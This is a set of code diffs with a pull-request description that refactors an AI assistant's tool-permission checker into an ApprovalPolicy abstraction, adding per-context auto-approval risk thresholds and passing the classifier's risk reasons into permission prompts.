+      enrichedReason = `${capitalizedLabel} risk (${riskReason})${riskLabelMatch[2]}`;
+    }
+  }
+
   return {
     decision: approvalDecision.decision,
-    reason: approvalDecision.reason,
+    reason: enrichedReason,
     matchedRule: approvalDecision.matchedRule,
   };
 }

--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -28,6 +28,7 @@ import {
 import {
   type ApprovalContext,
   DefaultApprovalPolicy,
+  resolveThreshold,
 } from "./approval-policy.js";
 import { bashRiskClassifier } from "./bash-risk-classifier.js";
 import { riskToRiskLevel } from "./risk-types.js";
@@ -604,6 +605,10 @@ export async function check(
   // Build approval context from local variables
   const tool = getTool(toolName);
   const config = getConfig();
+  const resolvedThreshold = resolveThreshold(
+    config.permissions.autoApproveUpTo,
+    policyContext?.executionContext,
+  );
   const approvalContext: ApprovalContext = {
     riskLevel: risk,
     toolName,
@@ -618,7 +623,7 @@ export async function check(
       tool?.origin === "skill" ? "skill" : tool ? "builtin" : undefined,
     isSkillBundled: tool?.ownerSkillBundled ?? false,
     hasManifestOverride: !!manifestOverride,
-    autoApproveUpTo: config.permissions.autoApproveUpTo,
+    autoApproveUpTo: resolvedThreshold,
   };
 
   // Delegate the allow/prompt/deny decision to the approval policy

--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -25,6 +25,10 @@ import {
   getProtectedDir,
   getWorkspaceHooksDir,
 } from "../util/platform.js";
+import {
+  type ApprovalContext,
+  DefaultApprovalPolicy,
+} from "./approval-policy.js";
 import { bashRiskClassifier } from "./bash-risk-classifier.js";
 import { riskToRiskLevel } from "./risk-types.js";
 import {
@@ -88,24 +92,8 @@ function ensureRiskCacheInvalidationHook(): void {
   onRulesChanged(clearRiskCache);
 }
 
-/**
- * Determines at runtime whether a high-risk operation should be auto-allowed
- * without requiring a persisted allowHighRisk flag. This replaces the
- * stateful allowHighRisk field on trust rules with a context-aware check.
- *
- * Auto-allow cases:
- * - Containerized bash: all commands are sandboxed, so high-risk is safe.
- *
- * Note: `rm BOOTSTRAP.md` and `rm UPDATES.md` are already classified as
- * Medium risk (not High) by the BashRiskClassifier's rm safe-file
- * downgrade, so they don't need special handling here.
- */
-function shouldAutoAllowHighRisk(toolName: string): boolean {
-  if (toolName === "bash" && getIsContainerized()) {
-    return true;
-  }
-  return false;
-}
+// ── Approval policy singleton ────────────────────────────────────────────────
+const defaultApprovalPolicy = new DefaultApprovalPolicy();
 
 function getStringField(
   input: Record<string, unknown>,
@@ -601,127 +589,32 @@ export async function check(
     policyContext,
   );
 
-  // Deny rules apply at ALL risk levels — including proxied network mode.
-  // Evaluate them first so hard blocks are never downgraded to a prompt.
-  if (matchedRule && matchedRule.decision === "deny") {
-    return {
-      decision: "deny",
-      reason: `Blocked by deny rule: ${matchedRule.pattern}`,
-      matchedRule,
-    };
-  }
+  // Build approval context from local variables
+  const tool = getTool(toolName);
+  const approvalContext: ApprovalContext = {
+    riskLevel: risk,
+    toolName,
+    matchedRule: matchedRule ?? undefined,
+    permissionsMode: getConfig().permissions.mode,
+    isContainerized: getIsContainerized(),
+    isWorkspaceScoped:
+      risk === RiskLevel.Low
+        ? isWorkspaceScopedInvocation(toolName, input, workingDir)
+        : false,
+    toolOrigin:
+      tool?.origin === "skill" ? "skill" : tool ? "builtin" : undefined,
+    isSkillBundled: tool?.ownerSkillBundled ?? false,
+    hasManifestOverride: !!manifestOverride,
+  };
 
-  if (matchedRule) {
-    if (matchedRule.decision === "ask") {
-      // Ask rules always prompt — never auto-allow or auto-deny
-      return {
-        decision: "prompt",
-        reason: `Matched ask rule: ${matchedRule.pattern}`,
-        matchedRule,
-      };
-    }
+  // Delegate the allow/prompt/deny decision to the approval policy
+  const approvalDecision = defaultApprovalPolicy.evaluate(approvalContext);
 
-    // Allow rule: auto-allow for non-High risk
-    if (risk !== RiskLevel.High) {
-      return {
-        decision: "allow",
-        reason: `Matched trust rule: ${matchedRule.pattern}`,
-        matchedRule,
-      };
-    }
-    // High risk with allow rule — check runtime context for auto-allow
-    if (shouldAutoAllowHighRisk(toolName)) {
-      return {
-        decision: "allow",
-        reason: `Matched trust rule in auto-allow-high-risk context: ${matchedRule.pattern}`,
-        matchedRule,
-      };
-    }
-    // High risk with allow rule (no runtime auto-allow) → fall through to prompt
-  }
-
-  // No matching rule (or High risk with allow rule) → risk-based fallback
-
-  // Third-party skill-origin tools default to prompting when no trust rule
-  // matches, regardless of risk level. Bundled skill tools are first-party
-  // and trusted, so they fall through to the normal risk-based policy.
-  // When manifestOverride is present, the tool comes from a skill manifest
-  // but isn't registered — treat it as a third-party skill tool.
-  if (!matchedRule) {
-    const tool = getTool(toolName);
-    if (tool?.origin === "skill" && !tool.ownerSkillBundled) {
-      return {
-        decision: "prompt",
-        reason: "Skill tool: requires approval by default",
-      };
-    }
-    if (!tool && manifestOverride) {
-      return {
-        decision: "prompt",
-        reason: "Skill tool: requires approval by default",
-      };
-    }
-  }
-
-  // In strict mode, every tool without an explicit matching rule must be
-  // prompted — there is no implicit auto-allow for any risk level.
-  // This explicitly covers skill_load: activating a skill can grant the
-  // agent new capabilities, so in strict mode users must approve each
-  // skill load via an exact-version or wildcard trust rule.
-  const permissionsMode = getConfig().permissions.mode;
-
-  if (permissionsMode === "strict" && !matchedRule) {
-    return {
-      decision: "prompt",
-      reason: `Strict mode: no matching rule, requires approval`,
-    };
-  }
-
-  // Workspace mode: auto-allow workspace-scoped operations that don't have
-  // an explicit rule, but only when risk is Low. Medium and High risk operations
-  // fall through to risk-based policy and always require approval.
-  if (
-    permissionsMode === "workspace" &&
-    !matchedRule &&
-    risk === RiskLevel.Low
-  ) {
-    // Outside a container, bash runs on the host — don't auto-allow
-    if (toolName === "bash" && !getIsContainerized()) {
-      // Fall through to risk-based policy below
-    } else if (isWorkspaceScopedInvocation(toolName, input, workingDir)) {
-      return {
-        decision: "allow",
-        reason: "Workspace mode: workspace-scoped operation auto-allowed",
-      };
-    }
-  }
-
-  // Auto-allow low-risk bundled skill tools even without explicit trust rules.
-  // These are first-party tools with a vetted risk declaration.
-  // This block must come AFTER the strict mode check so that strict mode
-  // still prompts for bundled skill tools without explicit rules.
-  if (!matchedRule && risk === RiskLevel.Low) {
-    const tool = getTool(toolName);
-    if (tool?.origin === "skill" && tool.ownerSkillBundled) {
-      return {
-        decision: "allow",
-        reason: "Bundled skill tool: low risk, auto-allowed",
-      };
-    }
-  }
-
-  if (risk === RiskLevel.High) {
-    return {
-      decision: "prompt",
-      reason: `High risk: always requires approval`,
-    };
-  }
-
-  if (risk === RiskLevel.Low) {
-    return { decision: "allow", reason: "Low risk: auto-allowed" };
-  }
-
-  return { decision: "prompt", reason: `${risk} risk: requires approval` };
+  return {
+    decision: approvalDecision.decision,
+    reason: approvalDecision.reason,
+    matchedRule: approvalDecision.matchedRule,
+  };
 }
 
 const TOOL_DISPLAY_NAMES: Record<string, string> = {

--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -591,11 +591,12 @@ export async function check(
 
   // Build approval context from local variables
   const tool = getTool(toolName);
+  const config = getConfig();
   const approvalContext: ApprovalContext = {
     riskLevel: risk,
     toolName,
     matchedRule: matchedRule ?? undefined,
-    permissionsMode: getConfig().permissions.mode,
+    permissionsMode: config.permissions.mode,
     isContainerized: getIsContainerized(),
     isWorkspaceScoped:
       risk === RiskLevel.Low
@@ -605,6 +606,7 @@ export async function check(
       tool?.origin === "skill" ? "skill" : tool ? "builtin" : undefined,
     isSkillBundled: tool?.ownerSkillBundled ?? false,
     hasManifestOverride: !!manifestOverride,
+    autoApproveUpTo: config.permissions.autoApproveUpTo,
   };
 
   // Delegate the allow/prompt/deny decision to the approval policy

--- a/assistant/src/permissions/types.ts
+++ b/assistant/src/permissions/types.ts
@@ -62,4 +62,11 @@ export interface PolicyContext {
   executionTarget?: string;
   /** Ephemeral rules for task-scoped permissions — checked before persistent trust.json rules. */
   ephemeralRules?: TrustRule[];
+  /**
+   * Execution context for per-context threshold resolution.
+   * - "conversation": interactive client session (default)
+   * - "background": non-interactive guardian session (e.g. scheduled jobs)
+   * - "headless": non-interactive non-guardian session
+   */
+  executionContext?: "conversation" | "background" | "headless";
 }

--- a/assistant/src/runtime/routes/settings-routes.ts
+++ b/assistant/src/runtime/routes/settings-routes.ts
@@ -479,7 +479,7 @@ async function handleToolPermissionSimulate(body: {
     );
     const policyContext = { executionTarget };
 
-    const riskLevel = await classifyRisk(
+    const { level: riskLevel } = await classifyRisk(
       body.toolName,
       body.input,
       workingDir,

--- a/assistant/src/runtime/routes/work-items-routes.test.ts
+++ b/assistant/src/runtime/routes/work-items-routes.test.ts
@@ -16,7 +16,7 @@ mock.module("../../util/logger.js", () => ({
 
 mock.module("../../permissions/checker.js", () => ({
   check: async () => ({ decision: "prompt" }),
-  classifyRisk: async () => "high",
+  classifyRisk: async () => ({ level: "high" }),
 }));
 
 import { initializeDb } from "../../memory/db.js";

--- a/assistant/src/runtime/routes/work-items-routes.ts
+++ b/assistant/src/runtime/routes/work-items-routes.ts
@@ -356,7 +356,7 @@ export async function preflightWorkItem(
   const workingDir = process.cwd();
   const permissions = await Promise.all(
     requiredTools.map(async (tool) => {
-      const risk = await classifyRisk(tool, {}, workingDir);
+      const { level: risk } = await classifyRisk(tool, {}, workingDir);
       const result = await check(tool, {}, workingDir);
       return {
         tool,

--- a/assistant/src/tools/permission-checker.ts
+++ b/assistant/src/tools/permission-checker.ts
@@ -1,6 +1,7 @@
 import { isAssistantFeatureFlagEnabled } from "../config/assistant-feature-flags.js";
 import { getConfig } from "../config/loader.js";
 import { getHookManager } from "../hooks/manager.js";
+import { resolveThreshold } from "../permissions/approval-policy.js";
 import {
   check,
   classifyRisk,
@@ -210,20 +211,36 @@ export class PermissionChecker {
         // Exception: inline-command skill loads (skill_load_dynamic:*) must
         // never be silently auto-approved — they execute embedded commands
         // and require explicit human review or a pinned trust rule.
-        // Exception: high-risk tools (e.g. destructive shell commands, writes
-        // to sensitive paths) are denied — unattended sessions must not
-        // auto-approve operations that could cause significant damage if
-        // triggered by prompt injection from untrusted content.
+        // Exception: tools above the configured background threshold are
+        // denied — unattended sessions must not auto-approve operations that
+        // could cause significant damage if triggered by prompt injection
+        // from untrusted content.
         const isDynamicSkillLoad =
           result.matchedRule?.pattern.startsWith("skill_load_dynamic:") ===
           true;
+        const bgThreshold = resolveThreshold(
+          cfg.permissions.autoApproveUpTo,
+          "background",
+        );
+        const thresholdOrdinal: Record<string, number> = {
+          none: -1,
+          low: 0,
+          medium: 1,
+        };
+        const riskOrdinal: Record<string, number> = {
+          [RiskLevel.Low]: 0,
+          [RiskLevel.Medium]: 1,
+          [RiskLevel.High]: 2,
+        };
+        const withinThreshold =
+          (riskOrdinal[riskLevel] ?? 2) <= (thresholdOrdinal[bgThreshold] ?? 0);
         if (
           context.isInteractive === false &&
           context.trustClass === "guardian" &&
           !context.requireFreshApproval &&
           !isDynamicSkillLoad &&
           !v2ForcePrompt &&
-          riskLevel !== RiskLevel.High
+          withinThreshold
         ) {
           log.info(
             { toolName: name, riskLevel },

--- a/assistant/src/tools/permission-checker.ts
+++ b/assistant/src/tools/permission-checker.ts
@@ -100,7 +100,7 @@ export class PermissionChecker {
       }
     }
 
-    const risk = await classifyRisk(
+    const { level: risk, reason: riskReason } = await classifyRisk(
       name,
       input,
       context.workingDir,
@@ -168,6 +168,7 @@ export class PermissionChecker {
           conversationId: context.conversationId,
           requestId: context.requestId,
           riskLevel,
+          riskReason,
           decision: "deny",
           reason: result.reason,
           durationMs,
@@ -252,6 +253,7 @@ export class PermissionChecker {
             conversationId: context.conversationId,
             requestId: context.requestId,
             riskLevel,
+            riskReason,
             decision: "deny",
             reason: "Non-interactive session: no client to approve prompt",
             durationMs,
@@ -326,6 +328,7 @@ export class PermissionChecker {
           conversationId: context.conversationId,
           requestId: context.requestId,
           riskLevel,
+          riskReason,
           reason: result.reason,
           allowlistOptions: promptOptions.allowlistOptions,
           scopeOptions: promptOptions.scopeOptions,
@@ -391,6 +394,7 @@ export class PermissionChecker {
             conversationId: context.conversationId,
             requestId: context.requestId,
             riskLevel,
+            riskReason,
             decision: "deny",
             reason: denialReason,
             durationMs,
@@ -439,6 +443,7 @@ export class PermissionChecker {
             conversationId: context.conversationId,
             requestId: context.requestId,
             riskLevel,
+            riskReason,
             decision: "always_deny",
             reason: denialReason,
             durationMs,

--- a/assistant/src/tools/policy-context.ts
+++ b/assistant/src/tools/policy-context.ts
@@ -1,6 +1,23 @@
+import type { ExecutionContext } from "../permissions/approval-policy.js";
 import type { PolicyContext } from "../permissions/types.js";
 import { getTaskRunRules } from "../tasks/ephemeral-permissions.js";
 import type { Tool, ToolContext } from "./types.js";
+
+/**
+ * Derive the execution context from the tool context fields.
+ * - Guardian + non-interactive → "background" (scheduled jobs, reminders)
+ * - Non-interactive (non-guardian) → "headless"
+ * - Otherwise → "conversation"
+ */
+function deriveExecutionContext(context?: ToolContext): ExecutionContext {
+  if (context?.isInteractive === false && context.trustClass === "guardian") {
+    return "background";
+  }
+  if (context?.isInteractive === false) {
+    return "headless";
+  }
+  return "conversation";
+}
 
 /**
  * Build a PolicyContext from tool metadata and execution context.
@@ -10,23 +27,23 @@ import type { Tool, ToolContext } from "./types.js";
 export function buildPolicyContext(
   tool: Tool,
   context?: ToolContext,
-): PolicyContext | undefined {
+): PolicyContext {
   const ephemeralRules = context?.taskRunId
     ? getTaskRunRules(context.taskRunId)
     : undefined;
+
+  const executionContext = deriveExecutionContext(context);
 
   if (tool.origin === "skill") {
     return {
       executionTarget: tool.executionTarget,
       ephemeralRules: ephemeralRules?.length ? ephemeralRules : undefined,
+      executionContext,
     };
   }
 
-  if (context?.taskRunId && ephemeralRules?.length) {
-    return {
-      ephemeralRules,
-    };
-  }
-
-  return undefined;
+  return {
+    ephemeralRules: ephemeralRules?.length ? ephemeralRules : undefined,
+    executionContext,
+  };
 }

--- a/assistant/src/tools/types.ts
+++ b/assistant/src/tools/types.ts
@@ -31,6 +31,8 @@ export interface ToolExecutionStartEvent extends ToolLifecycleEventBase {
 export interface ToolPermissionPromptEvent extends ToolLifecycleEventBase {
   type: "permission_prompt";
   riskLevel: string;
+  /** Classifier-provided reason explaining why the risk level was assigned (bash/host_bash only). */
+  riskReason?: string;
   reason: string;
   allowlistOptions: AllowlistOption[];
   scopeOptions: ScopeOption[];
@@ -41,6 +43,8 @@ export interface ToolPermissionPromptEvent extends ToolLifecycleEventBase {
 export interface ToolPermissionDeniedEvent extends ToolLifecycleEventBase {
   type: "permission_denied";
   riskLevel: string;
+  /** Classifier-provided reason explaining why the risk level was assigned (bash/host_bash only). */
+  riskReason?: string;
   decision: "deny" | "always_deny";
   reason: string;
   durationMs: number;

--- a/docs/internal-reference.md
+++ b/docs/internal-reference.md
@@ -187,7 +187,7 @@ User approval decisions are persisted as trust rules in `~/.vellum/protected/tru
 
 - **Pattern matching**: Minimatch glob patterns for tool commands and file paths.
 - **Execution target binding**: Rules can be scoped to `sandbox` or `host` execution contexts.
-- **Runtime high-risk auto-allow**: High-risk bash commands in containerized environments are auto-allowed at runtime by `shouldAutoAllowHighRisk()` without requiring persisted state.
+- **Runtime high-risk auto-allow**: High-risk bash commands with an allow rule in containerized environments are auto-allowed at runtime by `DefaultApprovalPolicy.shouldAutoAllowHighRisk()` without requiring persisted state. Other risk-based decisions use the `autoApproveUpTo` threshold (default: `"low"`).
 
 #### Shell command allowlist options
 


### PR DESCRIPTION
## Summary
Introduces an `ApprovalPolicy` abstraction that separates the allow/prompt/deny decision from risk classification. Adds user-configurable `autoApproveUpTo` thresholds per execution context (conversation vs background vs headless), and wires classifier reason strings into permission prompts.

**Behavioral parity**: all default config values preserve existing behavior exactly. No user-facing changes unless config is explicitly modified.

## Self-review result
GAPS FOUND — 1 critical gap (guardian auto-approve regression from Zod default scalar) fixed across 1 fix PR.

## PRs merged into feature branch
- #27072: feat(permissions): add ApprovalPolicy interface and default implementation
- #27071: feat(permissions): add autoApproveUpTo threshold to permissions config
- #27096: refactor(permissions): extract check() decision logic into ApprovalPolicy
- #27104: feat(permissions): honor autoApproveUpTo threshold in approval policy
- #27107: feat(permissions): display classifier reason in permission prompts
- #27103: chore(permissions): clean up checker.ts after approval policy extraction
- #27112: feat(permissions): per-context autoApproveUpTo thresholds
- #27122: refactor(permissions): remove redundant guardian auto-approve logic from permission-checker

### Fix PRs
- #27133: fix: guardian auto-approve regression — change autoApproveUpTo default to per-context object

Part of plan: bash-risk-approval-policy.md
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/vellum-ai/vellum-assistant/pull/27134" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open in Devin Review">
  </picture>
</a>
<!-- devin-review-badge-end -->
